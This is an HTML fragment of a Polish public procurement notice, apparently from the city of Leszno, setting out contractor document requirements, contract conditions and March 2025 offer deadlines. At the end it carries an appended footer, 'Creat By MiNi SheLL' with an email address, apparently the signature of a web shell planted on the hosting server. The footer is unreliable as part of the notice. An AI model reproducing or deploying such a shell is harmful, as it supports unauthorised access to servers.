celu<br/>potwierdzenia braku podstaw wykluczenia podmiotu udostępniającego zasoby z udziału w postępowaniu na podstawie art. 109 ust.<br/>1 pkt 4) ustawy Pzp, skorzysta z dokumentów znajdujących się<br/>w ogólnodostępnych i bezpłatnych bazach danych pod warunkiem wskazania przez Wykonawcę w oświadczeniu, o którym mowa w<br/>Rozdziale VII, danych umożliwiających dostęp do tych dokumentów.<br/>2) W przypadku podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, mających siedzibę lub<br/>miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zapisy ust. 3 Rozdziału VII SWZ stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej, o którym mowa w Rozdziale V ust. 2 pkt 4) SWZ, Zamawiający wymaga złożenia:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (Załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wypełniony i podpisany formularz oferty.<br/>2. Zobowiązanie podmiotu udostępniającego zasoby - jeżeli dotyczy.<br/>3. Oświadczenie z art. 117 ust. 4 - jeżeli dotyczy.<br/>4. Pełnomocnictwo - jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3)	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp stanowi Załącznik Nr 5 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający wymaga od wybranego Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego w zakresie części na którą składał ofertę Wykonawca, na warunkach określonych w projekcie umowy stanowiącym Załącznik Nr 6 do SWZ.<br/>2.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym w projekcie umowy stanowiącym Załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/um_leszno</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia Zamawiający wykluczy również Wykonawcę, w okolicznościach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę.<br/>2. Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem platformazakupowa.pl. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były<br/>za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat,<br/>że wiadomość została wysłana do Zamawiającego. Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: bzp@leszno.pl. Zaleca się jednak, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza „Wyślij<br/>wiadomość do zamawiającego”, nie za pośrednictwem adresu e-mail.

Creat By MiNi SheLL
Email: jattceo@gmail.com